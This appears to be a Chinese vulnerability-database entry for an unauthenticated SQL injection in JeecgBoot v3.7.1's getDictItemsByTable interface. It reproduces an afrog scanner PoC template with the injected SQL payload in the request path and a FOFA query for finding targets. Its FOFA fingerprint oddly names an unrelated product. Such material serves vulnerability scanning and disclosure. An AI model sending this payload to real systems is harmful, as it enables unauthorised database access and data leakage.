jeecg-boot-getdictitemsbytable-sqli: jeecg-boot getDictItemsByTable接口存在SQL注入漏洞

日期: 2025-09-01 | 影响软件: jeecg-boot | POC: 已公开

漏洞描述

在 JeecgBoot v3.7.1 中，getDictItemsByTable组件存在 SQL 注入漏洞。攻击者可以利用该漏洞在无需权限的情况下查询数据库，导致数据库信息泄露 FOFA: app="孚盟软件-孚盟云"

PoC代码[已公开]

id: jeecg-boot-getdictitemsbytable-sqli

info:
  name: jeecg-boot getDictItemsByTable接口存在SQL注入漏洞
  author: AVIC123
  severity: high
  verified: true
  description: |-
    在 JeecgBoot v3.7.1 中，getDictItemsByTable组件存在 SQL 注入漏洞。攻击者可以利用该漏洞在无需权限的情况下查询数据库，导致数据库信息泄露
    FOFA: app="孚盟软件-孚盟云"
  reference:
    - https://mp.weixin.qq.com/s/sb2Vr3_nn9BkYjP9rbBHrQ
  tags: jeecg-boot,sqli
  created: 2025/08/22

rules:
  r0:
    request:
      method: GET
      path: /api/sys/ng-alain/getDictItemsByTable/' from sys_user/(SELECT CONCAT(CONCAT('qzkqq',(CASE WHEN (8960=8960) THEN '1' ELSE '0' END)),'qbvkq')), '/x.js
    expression: response.status == 200 && response.body.bcontains(b'qzkqq1qbvkq')

expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/jeecg-boot-getdictitemsbytable-sqli.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

jeecg-boot-unauth: Jeecg Boot Unauth POC

jeecg-boot-jmreport-upload: jeecg-boot-jmreport接口任意文件上传漏洞 POC

Jeecg-boot v2.1.2-v3.0.0 后台未授权SQL注入漏洞: Jeecg-boot v2.1.2-v3.0.0 后台未授权SQL注入漏洞 POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞 无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞无POC